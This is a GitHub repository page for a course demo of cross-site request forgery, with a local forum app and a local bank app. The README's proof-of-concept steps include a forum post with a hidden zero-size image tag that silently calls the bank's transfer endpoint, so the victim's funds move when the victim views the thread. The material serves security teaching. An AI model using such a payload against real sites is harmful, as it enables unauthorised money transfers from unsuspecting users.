Skip to content
/ CSRF_PoC Public

CSRF vulnerability demo for the Security Protocols course.

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

raresvis/CSRF_PoC

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
README
README
 
 
bank.py
bank.py
 
 
forum.py
forum.py
 
 

Repository files navigation

See forum.py and bank.py for instructions on how to start the services.
Notice that flask needs to be installed:
	sudo pip install Flask

Proof-of-Concept steps:
	Attacker:
		1. Login: http://localhost:1666/login/2
		2. Post malicious message: http://localhost:1666/post/<img src="http://localhost:1999/transfer/2/100" height="0" width="0" border="0">
		3. Logout: http://localhost:1666/logout

	Victim:
		1. Login on the bank site: http://localhost:1999/login/1
		# redirection to /deposits
		2. Loggin on the forum site: http://localhost:1666/login/1
		# redirection to /thread
		# refresh /deposits and see account 0 for victim (user id 1)

About

CSRF vulnerability demo for the Security Protocols course.

Resources

Readme
Activity

Stars

0 stars

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages